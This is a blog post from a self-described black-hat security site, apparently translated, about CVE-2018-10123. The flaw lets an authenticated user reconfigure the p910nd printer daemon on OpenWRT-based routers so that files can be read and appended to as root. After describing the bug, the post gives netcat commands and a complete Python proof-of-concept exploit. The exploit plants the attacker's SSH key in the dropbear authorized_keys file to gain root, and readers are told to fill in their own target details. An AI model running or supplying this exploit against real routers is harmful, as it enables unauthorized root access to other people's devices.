七夕云黑帽博客-专注互联网络安全-webshell七夕,七夕黑帽博客,QQ905690245

基于OpenWRT的路由器打印服务获取 root 权限

2020-11-18 21:43 作者:Mr.刘 | 网络安全 | 标签: 基于OpenWRT的路由器打印服务获取 root 权限

我在Inteno的IOPSYS固件中发现了另一个漏洞,但我相信这会影响打印机服务器p910nd附带的所有OpenWRT或基于LEDE的路由器。任何经过身份验证的用户都可以修改打印机服务器的配置,允许他们以根用户的身份读取任何文件并将其追加到任何文件中。这可以导致信息泄漏和远程代码执行。此漏洞已被分配给CVE ID: CVE-2018-10123

我以前写过关于Inteno设备漏洞的报告(123)。我建议阅读第一篇文章,因为它描述了如何调用路由器上的函数-包括那些可能不在管理面板中列出的函数。

在查看经过身份验证的用户可以修改的配置时,我注意到了p910nd的一个部分。根据OpenWRTwiki,它是一个轻量级守护进程(daemon),主要负责连接到路由器的设备和连接到路由器的打印机之间的网关。它在默认情况下是禁用的,但是可以很容易地在管理面板中启用。默认情况下,如下所示:

> {"jsonrpc":"2.0","method":"call","params":["0123456789abcdefgh0123456789abcd","uci","get",{config:"p910nd"}],"id":0}

< [...] {".anonymous": True, ".type": "p910nd", ".name": "cfg02f941", ".index": 0, "device": "/dev/usb/lp0", "port": "0", "bidirectional": "1", "enabled": "0"} 

我感兴趣的是设备的价值。从管理的角度来看,这是有意义的,但是普通的最终用户不应该能够改变这一点。还有,如果我们把p910nd指向其他东西-也许是一个文件-会发生什么?出于测试目的,通过SSH访问权限,我创建了一个测试文件:

# cat > /tmp/test << EOF > Testing123 > EOF 

我启用了p910并更改了设备以指向我们新创建的文件:

> {"jsonrpc":"2.0","method":"call","params":["0123456789abcdefgh0123456789abcd","uci","set",{config:"p910nd",type:"p910nd",values:{enabled:"1",device:"/tmp/test"}}],"id":1}  > {"jsonrpc":"2.0","method":"call","params":["0123456789abcdefgh0123456789abcd","uci","commit",{config:"p910nd"}],"id":2} 

根据文档,服务侦听端口9100。我使用Netcat连接到该端口:

$ ncat 192.168.1.1 9100 Testing123 

马上就得到了文件的内容。我修改了测试文件的权限,以查看是否可以读取具有根用户访问权限的文件:

# chmod 600 /tmp/test # ls -al /tmp/test -rw-------    1 root    root    11 Apr 14 23:23 /tmp/test 

同样,我们可以成功地读取文件:

$ ncat 192.168.1.1 9100 Testing123 

这是可以理解的,因为p910nd守护进程在系统上有根权限。该配置还有一个名为bidirectional的值,值被设置为1。这是否意味着我们也可以写入文件呢?我在Netcat中键入了另一个测试字符串,看它是否会被附加到文件中。我按下回车键,以确保字符串正在发送:

$ ncat 192.168.1.1 9100 Testing123
foobar 

检查文件是否发生了更改:

# cat /tmp/test Testing123
foobar 

事实上,即使是写入文件也是可能的!这使得攻击者能够轻松地访问系统。例如,可以使用UID 0和已知密码将用户添加到/etc/passwd。

在进行了一些测试之后,我还得出一个结论,攻击者希望写入的文件必须已经存在-只需将设备值更改为不存在的文件,就不会创建该文件。但是,攻击者仍然可以将脚本附加到作为根用户执行的脚本,并添加他们希望执行的任何代码。

我编写了一个PoC,将一行附加到/etc/init.d/p910nd脚本,在执行时,该脚本将用我的SSH键覆盖/etc/Drop/Authorated_Key,使我能够轻松地以根用户身份进行SSH。每次通过UCI提交更改时都会执行此脚本,UCI使用UCI重新启动服务。执行的脚本:

如果你有一个具有受限访问权限的Inteno路由器,则可以使用此PoC添加自己的SSH密钥并以根用户身份登录。它还可以与p910nd捆绑的其他路由器一起工作,并使用jsonrpc协议进行通信。最后,你可能必须也将IP更改为/ubus。如果使用不同的协议,则需要不同的PoC。

这个PoC需要Python3.6和一个名为webSocket-Client的模块,你可以通过pip安装webSocket-Client来安装这个模块。请注意,如果你想使用它,就应该编辑脚本的第58-61行,以便包含适当的IP、用户名、密码和SSH密钥,还可以编辑第63行,以包含您自己的执行代码。

#!/usr/bin/python3 import json import sys import socket import os import time from websocket import create_connection def ubusAuth(host, username, password): ws = create_connection("ws://" + host, header = ["Sec-WebSocket-Protocol: ubus-json"])
    req = json.dumps({"jsonrpc":"2.0","method":"call", "params":["00000000000000000000000000000000","session","login",
        {"username": username,"password":password}], "id":666})
    ws.send(req)
    response =  json.loads(ws.recv())
    ws.close() try:
        key = response.get('result')[1].get('ubus_rpc_session') except IndexError: return(None) return(key) def ubusCall(host, key, namespace, argument, params={}): ws = create_connection("ws://" + host, header = ["Sec-WebSocket-Protocol: ubus-json"])
    req = json.dumps({"jsonrpc":"2.0","method":"call", "params":[key,namespace,argument,params], "id":666})
    ws.send(req)
    response =  json.loads(ws.recv())
    ws.close() try:
        result = response.get('result')[1] except IndexError: if response.get('result')[0] == 0: return(True) return(None) return(result) def sendData(host, port, data=""): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.sendall(data.encode('utf-8'))
    s.shutdown(socket.SHUT_WR)
    s.close() return(None) def recvData(host, port): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    data = s.recv(1024)
    s.shutdown(socket.SHUT_WR)
    s.close() return(data) if __name__ == "__main__":
    host     = "192.168.1.1" username = "user" password = "user" key      = "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAkQMU/2HyXNEJ8gZbkxrvLnpSZ4Xz+Wf3QhxXdQ5blDI5IvDkoS4jHoi5XKYHevz8YiaX8UYC7cOBrJ1udp/YcuC4GWVV5TET449OsHBD64tgOSV+3s5r/AJrT8zefJbdc13Fx/Bnk+bovwNS2OTkT/IqYgy9n+fKKkSCjQVMdTTrRZQC0RpZ/JGsv2SeDf/iHRa71keIEpO69VZqPjPVFQfj1QWOHdbTRQwbv0MJm5rt8WTKtS4XxlotF+E6Wip1hbB/e+y64GJEUzOjT6BGooMu/FELCvIs2Nhp25ziRrfaLKQY1XzXWaLo4aPvVq05GStHmTxb+r+WiXvaRv1cbQ== rsa-key-20170427" payload  = ("""
    /bin/echo "%s" > /etc/dropbear/authorized_keys;
    """ % key)

    print("Authenticating...")
    key = ubusAuth(host, username, password) if (not key):
        print("Auth failed!")
        sys.exit(1)
    print("Got key: %s" % key)

    print("Enabling p910nd and setting up exploit...")
    pwn910nd = ubusCall(host, key, "uci", "set",
        {"config":"p910nd", "type":"p910nd", "values":
        {"enabled":"1", "interface":"lan", "port":"0", "device":"/etc/init.d/p910nd"}}) if (not pwn910nd):
        print("Enabling p910nd failed!")
        sys.exit(1)

    print("Committing changes...")
    p910ndc = ubusCall(host, key, "uci", "commit",
        {"config":"p910nd"}) if (not p910ndc):
        print("Committing changes failed!")
        sys.exit(1)

    print("Waiting for p910nd to start...")
    time.sleep(5)

    print("Sending key...")
    sendData(host, 9100, payload)

    print("Triggerring exploit...")
    print("Cleaning up...")

    dis910nd = ubusCall(host, key, "uci", "set",
        {"config":"p910nd", "type":"p910nd", "values":
        {"enabled":"0", "device":"/dev/usb/lp0"}}) if (not dis910nd):
        print("Exploit and clean up failed!")
        sys.exit(1)

    p910ndc = ubusCall(host, key, "uci", "commit",
        {"config":"p910nd"}) if (not p910ndc):
        print("Exploit and clean up failed!")
        sys.exit(1)

    print("Exploitation complete")
  • blogger
分享本文至:

文章作者:Mr.刘 作者QQ:905690245
文章地址:http://www.blog.qixiwangluo.com/?post=154
版权所有 © 转载时必须以链接形式注明作者和原始出处!

发表评论:



如有侵犯您的版权请发送QQ邮件至905690245@qq.com

CopyRight 2020 七夕云黑帽博客-专注互联网络安全.All rights reserved.

技术支持:攀枝花七夕云网络